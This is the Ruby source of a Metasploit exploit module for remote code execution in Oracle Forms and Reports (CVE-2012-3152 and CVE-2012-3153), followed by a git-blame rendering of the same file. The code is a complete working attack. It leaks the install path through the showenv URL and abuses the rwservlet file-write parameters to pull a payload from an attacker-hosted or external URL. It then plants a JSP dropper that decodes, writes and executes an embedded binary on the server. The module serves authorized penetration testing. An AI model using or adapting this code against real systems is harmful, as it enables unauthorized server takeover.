modules/exploits/multi/http/oracle_reports_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'uri'

class MetasploitModule < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  Rank = GreatRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Oracle Forms and Reports Remote Code Execution',
      'Description'     => %q{
      This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution
      on the host. The showenv url can be used to disclose information about a server. A second
      vulnerability that allows arbitrary reading and writing to the host filesystem can then be
      used to write a shell from a remote url to a known local path disclosed from the previous
      vulnerability.

      The local path being accessible from an URL allows an attacker to perform the remote code
      execution using, for example, a .jsp shell.

      This module was tested successfully on Windows and Oracle Forms and Reports 10.1.
      },
      'Author'          =>
        [
          'miss_sudo <security[at]netinfiltration.com>', # Vulnerability discovery
          'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ "CVE", "2012-3152" ],
          [ "CVE", "2012-3153" ],
          [ "OSVDB", "86395" ], # Matches CVE-2012-3152
          [ "OSVDB", "86394" ], # Matches CVE-2012-3153
          [ "EDB", "31253" ]
        ],
      'Stance'          => Msf::Exploit::Stance::Aggressive,
      'Platform'        => ['win', 'linux'],
      'Targets'         =>
        [
          [ 'Linux',
            {
            'Arch' => ARCH_X86,
            'Platform' => 'linux'
            }
          ],
          [ 'Windows',
            {
            'Arch' => ARCH_X86,
            'Platform' => 'win'
            }
          ],
        ],
      'DefaultTarget'   => 0,
      'DisclosureDate'  => '2014-01-15'
    ))
    register_options(
      [
        OptString.new('EXTURL', [false, 'An external host to request the payload from', "" ]),
        OptString.new('PAYDIR', [true, 'The folder to download the payload to', "/images/" ]),
        OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
      ])
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
      'method' => 'GET'
      })

    if res and res.code == 200
      if res.body =~ /\\(.*)\\showenv/
        vprint_good "Windows install detected "
        path = $1.gsub("\\", "/")
        vprint_status "Path:  #{path}"
      elsif res.body =~ /\/(.*)\/showenv/
        vprint_good "Linux install detected"
        vprint_status "Path:  #{$1}"
      else
        return Exploit::CheckCode::Safe
      end
    end

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
      'method' => 'GET',
       'vars_get' => {
       'report' => 'test.rdf',
       'desformat' => 'html',
       'destype' => 'cache',
       'JOBTYPE' => 'rwurl',
       'URLPARAMETER' => 'file:///'
       }
      })

    if res and res.code == 200 and res.body.downcase.exclude?("<html>")
      vprint_good "URLPARAMETER is vulnerable"
      return Exploit::CheckCode::Vulnerable
    else
      vprint_status "URLPARAMETER is not vulnerable"
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    @payload_url = ""
    @payload_name = rand_text_alpha(8+rand(8)) + ".jsp"
    @payload_dir = datastore['PAYDIR']
    @local_path = ""

    print_status "Querying showenv!"
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
      'method' => 'GET',
      })

    if res and res.code == 200
      if res.body =~ /\\(.*)\\showenv/
        print_good "Query succeeded!"
        print_status "Windows install detected "
        @local_path = $1.gsub("\\", "/")
        print_status "Path: #{@local_path }"
      elsif res.body =~ /\/(.*)\/showenv/
        print_good "Query succeeded!"
        print_status "Linux install detected"
        @local_path = $1
        print_status "Path:  #{@local_path }"
      else
        print_error "Query failed"
        fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
    end

    if datastore['EXTURL'].blank?
      print_status "Hosting payload locally ..."
      begin
        Timeout.timeout(datastore['HTTPDELAY']) {super}
      rescue Timeout::Error
      end
      exec_payload
    else
      print_status "Using external url for payload delivery ..."
      @payload_url = datastore['EXTURL']
      upload_payload
      exec_payload
    end
  end

  def primer
    @payload_url = get_uri
    @pl = gen_file_dropper
    upload_payload
  end

  def on_request_uri(cli, request)
    send_response(cli, @pl)
  end

  def autofilter
    true
  end

  def upload_payload
    print_status "Uploading payload ..."
    path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
      'method' => 'GET',
      'encode_params' => false,
      'vars_get' => {
        'report' => 'test.rdf',
        'desformat' => 'html',
        'destype' => 'file',
        'desname' => path,
        'JOBTYPE' => 'rwurl',
        'URLPARAMETER' => @payload_url
       }
    })

    if res and res.code == 200
      print_good "Payload hopefully uploaded!"
    else
      print_error "Payload upload failed"
    end
  end

  def gen_file_dropper
    big_payload =  false #size matters :(

    gen_payload_name  = rand_text_alpha(8+rand(8))
    encoded_pl  = Rex::Text.encode_base64(generate_payload_exe)
    print_status "Building JSP shell ..."

    len = encoded_pl.length
    if len >= 60000 #java string size limit ~60k workaround
      print_status "Adjusting shell due to payload size"
      pl_first = encoded_pl.slice(0, 60000)
      pl_second = encoded_pl.slice(60000, len)
      big_payload = true
    end

    #embed our payload
    shell  = "<%@ page import=\"java.util.*,java.io.*, sun.misc.BASE64Decoder\"%>"
    shell += " <%"
    shell += " BASE64Decoder decoder = new BASE64Decoder();"
    #correct file suffix if windows
    if datastore['TARGET'] == 1
      shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".exe\");"
    else
      shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".tmp\");"
    end
    shell += " String path = temp.getAbsolutePath();"
    if big_payload
      shell += " byte [] pl = decoder.decodeBuffer(\"#{pl_first}\");"
      shell += " byte [] pltwo = decoder.decodeBuffer(\"#{pl_second}\");"

      shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
      shell += " ou.write(pl);"
      shell += " ou.close();"

      shell += " ou = new BufferedOutputStream(new FileOutputStream(path, true));"
      shell += " ou.write(pltwo);"
      shell += " ou.close();"
    else
      shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");"
      shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"
      shell += " ou.write(pl);"
      shell += " ou.close();"
    end
    #correct rights if linux host
    if datastore['TARGET'] == 0
      shell += " Process p = Runtime.getRuntime().exec(\"/bin/chmod 700 \" + path);"
      shell += " p.waitFor();"
    end
    shell += " Runtime.getRuntime().exec(path);"
    shell += "%>"

    return shell
  end

  def exec_payload
    print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}")
    print_status("Executing payload...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),
      'method' => 'GET'
    })

    if res and res.code == 200
       print_good("Payload executed!")
    else
       print_error("Payload execution failed")
    end
  end
end
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'uri'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00
			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::Remote::HttpServer::HTML`
updated 2014-01-31 14:33:18 +01:00			`include Msf::Exploit::EXE`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00
			`Rank = GreatRanking`

			`def initialize(info = {})`
			`super(update_info(info,`
In case people actually don't know what RCE means 2014-02-17 08:51:48 -06:00			`'Name' => 'Oracle Forms and Reports Remote Code Execution',`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`'Description' => %q{`
Pre-release fixes, including msftidy errors. 2014-02-18 14:02:37 -06:00			`This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution`
100 columns 2014-02-17 08:52:56 -06:00			`on the host. The showenv url can be used to disclose information about a server. A second`
			`vulnerability that allows arbitrary reading and writing to the host filesystem can then be`
			`used to write a shell from a remote url to a known local path disclosed from the previous`
			`vulnerability.`

40% done 2017-08-28 20:17:58 -04:00			`The local path being accessible from an URL allows an attacker to perform the remote code`
Pre-release fixes, including msftidy errors. 2014-02-18 14:02:37 -06:00			`execution using, for example, a .jsp shell.`
100 columns 2014-02-17 08:52:56 -06:00
Pre-release fixes, including msftidy errors. 2014-02-18 14:02:37 -06:00			`This module was tested successfully on Windows and Oracle Forms and Reports 10.1.`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`},`
			`'Author' =>`
			`[`
updated 2014-01-31 14:33:18 +01:00			`'miss_sudo <security[at]netinfiltration.com>', # Vulnerability discovery`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ "CVE", "2012-3152" ],`
			`[ "CVE", "2012-3153" ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ "OSVDB", "86395" ], # Matches CVE-2012-3152`
			`[ "OSVDB", "86394" ], # Matches CVE-2012-3153`
Remove bad references (dead links) 2015-10-27 12:41:32 -05:00			`[ "EDB", "31253" ]`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`],`
			`'Stance' => Msf::Exploit::Stance::Aggressive,`
updated 2014-01-31 14:33:18 +01:00			`'Platform' => ['win', 'linux'],`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`'Targets' =>`
			`[`
updated 2014-01-31 14:33:18 +01:00			`[ 'Linux',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`}`
			`],`
			`[ 'Windows',`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`{`
updated 2014-01-31 14:33:18 +01:00			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`}`
			`],`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2014-01-15'`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`))`
			`register_options(`
			`[`
bugfix and user supplied local path support 2014-02-15 16:24:59 +01:00			`OptString.new('EXTURL', [false, 'An external host to request the payload from', "" ]),`
updated and improved 2014-02-16 16:24:39 +01:00			`OptString.new('PAYDIR', [true, 'The folder to download the payload to', "/images/" ]),`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),`
			`])`
			`end`

			`def check`
updated 2014-01-31 21:59:26 +01:00			`res = send_request_cgi({`
updated and improved 2014-02-16 16:24:39 +01:00			`'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),`
updated 2014-01-31 21:59:26 +01:00			`'method' => 'GET'`
			`})`

updated and improved 2014-02-16 16:24:39 +01:00			`if res and res.code == 200`
			`if res.body =~ /\\(.*)\\showenv/`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_good "Windows install detected "`
updated and improved 2014-02-16 16:24:39 +01:00			`path = $1.gsub("\\", "/")`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_status "Path: #{path}"`
updated and improved 2014-02-16 16:24:39 +01:00			`elsif res.body =~ /\/(.*)\/showenv/`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_good "Linux install detected"`
			`vprint_status "Path: #{$1}"`
updated and improved 2014-02-16 16:24:39 +01:00			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'report' => 'test.rdf',`
			`'desformat' => 'html',`
			`'destype' => 'cache',`
			`'JOBTYPE' => 'rwurl',`
			`'URLPARAMETER' => 'file:///'`
			`}`
			`})`

			`if res and res.code == 200 and res.body.downcase.exclude?("<html>")`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_good "URLPARAMETER is vulnerable"`
check func fixed 2014-02-17 15:11:56 +01:00			`return Exploit::CheckCode::Vulnerable`
updated and improved 2014-02-16 16:24:39 +01:00			`else`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`vprint_status "URLPARAMETER is not vulnerable"`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`return Exploit::CheckCode::Safe`
			`end`
updated 2014-01-31 21:59:26 +01:00
Indent looks off for this line 2014-02-17 08:53:29 -06:00			`return Exploit::CheckCode::Safe`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`end`

			`def exploit`
			`@payload_url = ""`
			`@payload_name = rand_text_alpha(8+rand(8)) + ".jsp"`
updated 2014-01-31 14:33:18 +01:00			`@payload_dir = datastore['PAYDIR']`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`@local_path = ""`

Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Querying showenv!"`
updated 2014-01-31 21:59:26 +01:00			`res = send_request_cgi({`
updated and improved 2014-02-16 16:24:39 +01:00			`'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),`
			`'method' => 'GET',`
updated 2014-01-31 21:59:26 +01:00			`})`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00
updated and improved 2014-02-16 16:24:39 +01:00			`if res and res.code == 200`
			`if res.body =~ /\\(.*)\\showenv/`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good "Query succeeded!"`
			`print_status "Windows install detected "`
updated and improved 2014-02-16 16:24:39 +01:00			`@local_path = $1.gsub("\\", "/")`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Path: #{@local_path }"`
updated and improved 2014-02-16 16:24:39 +01:00			`elsif res.body =~ /\/(.*)\/showenv/`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good "Query succeeded!"`
			`print_status "Linux install detected"`
updated and improved 2014-02-16 16:24:39 +01:00			`@local_path = $1`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Path: #{@local_path }"`
updated and improved 2014-02-16 16:24:39 +01:00			`else`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_error "Query failed"`
fixed local server issues 2014-02-16 18:26:08 +01:00			`fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`end`
updated 2014-01-31 14:33:18 +01:00			`else`
			`fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")`
			`end`
updated and improved 2014-02-16 16:24:39 +01:00
updated 2014-01-31 14:33:18 +01:00			`if datastore['EXTURL'].blank?`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Hosting payload locally ..."`
updated 2014-01-31 14:33:18 +01:00			`begin`
			`Timeout.timeout(datastore['HTTPDELAY']) {super}`
			`rescue Timeout::Error`
			`end`
			`exec_payload`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`else`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Using external url for payload delivery ..."`
updated 2014-01-31 14:33:18 +01:00			`@payload_url = datastore['EXTURL']`
			`upload_payload`
			`exec_payload`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`end`
			`end`

fixed local server issues 2014-02-16 18:26:08 +01:00			`def primer`
			`@payload_url = get_uri`
			`@pl = gen_file_dropper`
			`upload_payload`
			`end`

			`def on_request_uri(cli, request)`
			`send_response(cli, @pl)`
			`end`

Fix autofilter values for aggressive modules 2015-10-13 15:56:18 -07:00			`def autofilter`
			`true`
			`end`

updated 2014-01-31 14:33:18 +01:00			`def upload_payload`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Uploading payload ..."`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`path = "/#{@local_path}#{@payload_dir}#{@payload_name}"`
			`res = send_request_cgi({`
updated 2014-01-31 21:59:26 +01:00			`'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`'method' => 'GET',`
			`'encode_params' => false,`
			`'vars_get' => {`
			`'report' => 'test.rdf',`
			`'desformat' => 'html',`
			`'destype' => 'file',`
			`'desname' => path,`
			`'JOBTYPE' => 'rwurl',`
			`'URLPARAMETER' => @payload_url`
updated 2014-01-31 21:59:26 +01:00			`}`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`})`

updated and improved 2014-02-16 16:24:39 +01:00			`if res and res.code == 200`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good "Payload hopefully uploaded!"`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`else`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_error "Payload upload failed"`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`end`
			`end`
updated 2014-01-31 14:33:18 +01:00
			`def gen_file_dropper`
updated and improved 2014-02-16 16:24:39 +01:00			`big_payload = false #size matters :(`

			`gen_payload_name = rand_text_alpha(8+rand(8))`
updated 2014-01-31 14:33:18 +01:00			`encoded_pl = Rex::Text.encode_base64(generate_payload_exe)`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Building JSP shell ..."`
updated 2014-01-31 14:33:18 +01:00
updated and improved 2014-02-16 16:24:39 +01:00			`len = encoded_pl.length`
			`if len >= 60000 #java string size limit ~60k workaround`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status "Adjusting shell due to payload size"`
updated and improved 2014-02-16 16:24:39 +01:00			`pl_first = encoded_pl.slice(0, 60000)`
			`pl_second = encoded_pl.slice(60000, len)`
			`big_payload = true`
			`end`

updated 2014-01-31 14:33:18 +01:00			`#embed our payload`
			`shell = "<%@ page import=\"java.util.,java.io., sun.misc.BASE64Decoder\"%>"`
			`shell += " <%"`
			`shell += " BASE64Decoder decoder = new BASE64Decoder();"`
			`#correct file suffix if windows`
			`if datastore['TARGET'] == 1`
			`shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".exe\");"`
			`else`
			`shell += " File temp = File.createTempFile(\"#{gen_payload_name}\", \".tmp\");"`
			`end`
			`shell += " String path = temp.getAbsolutePath();"`
updated and improved 2014-02-16 16:24:39 +01:00			`if big_payload`
			`shell += " byte [] pl = decoder.decodeBuffer(\"#{pl_first}\");"`
			`shell += " byte [] pltwo = decoder.decodeBuffer(\"#{pl_second}\");"`

			`shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"`
			`shell += " ou.write(pl);"`
			`shell += " ou.close();"`

			`shell += " ou = new BufferedOutputStream(new FileOutputStream(path, true));"`
			`shell += " ou.write(pltwo);"`
			`shell += " ou.close();"`
			`else`
			`shell += " byte [] pl = decoder.decodeBuffer(\"#{encoded_pl}\");"`
			`shell += " BufferedOutputStream ou = new BufferedOutputStream(new FileOutputStream(path));"`
			`shell += " ou.write(pl);"`
			`shell += " ou.close();"`
			`end`
updated 2014-01-31 14:33:18 +01:00			`#correct rights if linux host`
			`if datastore['TARGET'] == 0`
			`shell += " Process p = Runtime.getRuntime().exec(\"/bin/chmod 700 \" + path);"`
			`shell += " p.waitFor();"`
			`end`
			`shell += " Runtime.getRuntime().exec(path);"`
			`shell += "%>"`

			`return shell`
			`end`

			`def exec_payload`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Our payload is at: /reports#{@payload_dir}#{@payload_name}")`
			`print_status("Executing payload...")`
updated 2014-01-31 21:59:26 +01:00
updated and improved 2014-02-16 16:24:39 +01:00			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.path, "reports", @payload_dir, @payload_name),`
			`'method' => 'GET'`
			`})`

			`if res and res.code == 200`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_good("Payload executed!")`
updated and improved 2014-02-16 16:24:39 +01:00			`else`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_error("Payload execution failed")`
updated 2014-01-31 21:59:26 +01:00			`end`
updated 2014-01-31 14:33:18 +01:00			`end`
added module for Oracle Forms and Reports 2014-01-30 14:45:17 +01:00			`end`